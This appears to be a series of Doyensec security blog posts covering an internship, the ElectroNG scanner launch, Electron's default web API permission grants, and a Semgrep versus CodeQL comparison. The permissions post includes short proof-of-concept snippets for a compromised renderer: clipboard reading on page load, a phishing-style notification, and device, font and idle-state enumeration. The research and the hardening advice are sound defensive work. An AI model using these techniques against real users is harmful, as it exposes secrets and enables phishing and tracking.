Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue in the evening. I think these conditions are desirable for anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

  • Already has some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Fall Internship 2022.

ElectroNG, our premium SAST tool released!

5 September 2022 at 22:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

ElectroNG UI

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we quickly realized that Electronegativity needed a significant refresh, in terms of detection and features, to be able to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

ElectroNG UI

User Interface

If you’ve ever used Electronegativity, it will be immediately obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).


Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/TypeScript parsing and new heuristics. Building on that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')
}

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives while the second one is isolated. This is not always the case, and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

Affinity Diff By Versions

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

  • The specific Electron in use determines which webPreferences are applicable and which aren’t
  • The semantic and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual. If you’re a consultant, you can run ElectroNG for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development focus will be on features that are important to paying customers, with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity, since bug fixes and features that are applicable to the OSS version will also be ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.
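
For context, a rough sketch of that main-process plumbing is shown below. The desktopCapturer API is Electron’s real interface, but the surrounding flow is an assumption about a typical app, not an example from a specific application:

const { desktopCapturer } = require('electron')

// Main process: enumerate capture sources. A renderer can only record the
// screen if the app forwards one of these source ids to it, which the
// renderer then passes to navigator.mediaDevices.getUserMedia() as a constraint.
desktopCapturer.getSources({ types: ['screen', 'window'] }).then((sources) => {
  console.log(sources.map((s) => s.name))
})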

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between the three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps that seemingly handle microphone and video permissions separately are only tracking and respecting the user’s choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome, however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()
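
A minimal sketch of this enumeration, runnable from a renderer even with a deny-all permission handler in place, might look as follows:

// Renderer process: list media devices without any granted permission.
navigator.mediaDevices.enumerateDevices().then((devices) => {
  for (const device of devices) {
    // e.g., "audioinput: Default - MacBook Pro Microphone (Built-in)"
    console.log(`${device.kind}: ${device.label}`)
  }
})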

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.
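
A minimal sketch of such a handler is shown below; the catch-all callback(true) for the remaining permissions is an assumption for illustration, not a recommendation:

const { app, session } = require('electron')

app.whenReady().then(() => {
  session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
    if (permission === 'media') {
      return callback(false) // deny webcam, microphone, and screen capture requests
    }
    callback(true) // every other permission falls through to the app's default
  })
})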

File System Access API

The File System Access API normally allows reading and writing local files. In Electron, reading files has been implemented, but writing to files has not, and permission to write is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, the browser notifies you that you are granting access to that specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. Both of these are considerations mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Clipboard Reading Callback
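
A minimal sketch of the technique, as it could run inside a compromised renderer, is shown below:

// Renderer process: the load event counts as an allowed trigger, so the
// clipboard can be read with no user interaction.
window.addEventListener('load', async () => {
  const contents = await navigator.clipboard.readText()
  console.log(contents) // a real payload would exfiltrate this value
})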

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack
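
A hypothetical example of such an abuse from the renderer is sketched below; the notification text and URL are invented for illustration:

// Renderer process: fires a desktop notification that mimics a system prompt.
new Notification('Session expired', {
  body: 'Re-authenticate at https://login.example.com to keep your session.'
})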

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse
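
A short sketch of the API, as callable from an Electron renderer where the permission is granted by default, might look like this:

// Renderer process: observe the user's activity state. The 60-second
// threshold is the minimum the API allows.
(async () => {
  const detector = new IdleDetector()
  detector.addEventListener('change', () => {
    console.log(`user: ${detector.userState}, screen: ${detector.screenState}`)
  })
  await detector.start({ threshold: 60000 })
})()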

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse
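
A minimal sketch of this fingerprinting primitive is shown below:

// Renderer process: enumerate locally installed fonts with no prompt.
(async () => {
  const fonts = await window.queryLocalFonts()
  for (const font of fonts) {
    console.log(font.family, font.fullName) // a stable fingerprinting signal
  }
})()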

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);
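
Putting the two recommendations together, a sketch of an origin-restricted handler might look like the following; the https://app.example.com origin and the single allowed permission are hypothetical:

const { session } = require('electron')

// Reset first so previously granted permissions must be requested again.
session.defaultSession.setPermissionRequestHandler(null)

session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
  const requestingOrigin = new URL(webContents.getURL()).origin
  // Allow only notifications, and only for the expected application origin.
  callback(requestingOrigin === 'https://app.example.com' && permission === 'notifications')
})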

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

Comparing Semgrep and CodeQL

5 October 2022 at 22:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because ultimately, we all hope ideally that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design. Consider, for example, a systems administration application that executes shell commands via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are left with the subjective question of whether to classify a finding as a true or false positive when an application’s users can execute arbitrary code by design, given that they would need to be fully authenticated and authorized to do so.

These types of issues come from asking too much of the SAST application and we should focus on locating vulnerable code patterns - leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, findings on certain paths, or conditionally ignoring things, becomes very important to filter the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is a better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be a tool missing a vulnerability due to a parsing error (something that would likely be fixed in a later release) rather than a rule-matching issue specifically.

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) require prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source and an unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number of sources that lead to a protected sink, the total number of protected sinks, the total number of safe function calls (regardless of whether they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Semgrep VS CodeQL

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

  • Language and framework support
  • Lexer/Parser functionality
  • Pre/post scan options (exclusions, disabling checks, filtering, etc.)
  • Rules
  • Findings workflows (internal tracking, ticket system integration, etc.)
  • Scan times

Language and framework support

The images below outline the supported languages for each tool, refer to the source links for additional information about the supported frameworks:

Semgrep:
Semgrep results

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:
CodeQL results

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but a larger number, both in GA and under development in Semgrep. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code in which a custom function named exit() was declared and used. Because that name is reserved, the parser failed with an invalid syntax error once the function was reached. The two notable things here are that the code should theoretically not work properly and that, despite this, Semgrep was still able to perform a partial examination. Semgrep excelled in terms of its ability to handle incomplete code or code with errors, as it generally operates on a single-file scope.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

  • Choosing which rules, or groups of rules, to run, or allowing automatic selection
    • Semgrep registry rules (remote community and r2c created; currently 973 rules)
    • Local custom rules and/or “ephemeral” rules passed as an argument on the command line
    • A combination of the above
  • Choosing which languages to examine
  • A robust set of filtering options to include/exclude files, directories and specific content
  • Ability to configure a comparison baseline (find things not already in commit X)
  • Whether to continue if errors or vulnerabilities are encountered
  • Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
  • The maximum size of the files to scan
  • Output formats

Notes:

  1. While the tool does provide an automated scanning option, we found situations in which --config auto did not find all the vulnerabilities that manually selecting the language did.

  2. The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

  • Specifying which language(s) to process
    • The CodeQL repository contains libraries and specific queries for each language
    • The Security folder contains (21) queries for various CWEs
  • Which queries to run
  • Location of the files
  • When the queries are run on the resulting database you can specify the output format
  • Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*

The logic in the rules is familiar and amounts to what feels like stacking of RegExs, but with the added capability of creating boundaries around what is matched against and with the benefit of language comprehension. It is important to note however that Semgrep lacks a full understanding of the code flow sufficient enough to trace source to sink flows through complex code. By default it works on a single file basis, but Beta features also include the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool, with abstract syntax trees and control flow graphs.

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

  • Logical: all the operations in QL are logical operations.
  • Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
  • Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
  • Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one language at a time. Trying to specify a list of target languages (go, javascript and c) didn’t work out of the box, because CodeQL required the build command to be set explicitly for this combination of languages.

CodeQL can also be used as a VS Code extension, a CLI tool, or integrated with GitHub workflows. The VS Code extension allows writing queries with the support of the IDE’s autocompletion and testing them against one or more previously created databases.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // all the functions call where the argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Sensitive information may be compared in a non-constant-time manner"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user should know the CodeQL syntax very well and pay attention to the structure of the conditions to avoid killing performance. We experienced an infinite compilation time just by adding an OR condition to the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are only perceivable in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to setup, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

  • Scanning in a CI/CD pipeline - speed matters more
  • Ongoing periodic scans - speed matters less
  • Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.

Semgrep OWASP Benchmark Project results
CodeQL OWASP Benchmark Project results

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While initially seeming like a great way to compare the tools, unfortunately, the test case files presented several challenges to this approach. While being labeled things like “Good” and “Bad” either in file names or comments, the files were not necessarily all “Good” code or “Bad” code, but inconsistently mixed, inconsistently labeled and sometimes with multiple potential vulnerabilities in the same files. Additionally, we occasionally discovered vulnerabilities in some of the files which were not the CWE classes that were supposed to be in the files (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regards to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Semgrep/CodeQL cross-tool results

Notes:

  1. Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.

  2. Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319

  3. Semgrep’s results included only two vulnerabilities that were the ones intended to be found in the file (e.g., test for X, find X). The remainder were cleartext HTTP issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X but find valid Y instead).

  4. CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.

  5. Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.

  6. False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities and are therefore counted as TNs, and likewise that there are no FNs. This underscores that testing against code that has already been organized for evaluation can be assumed to be more accurate.

Running Semgrep with the “r2c-security-audit” configuration resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to count it as only one finding per file, so as not to further skew the results by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

Semgrep/CodeQL client code results
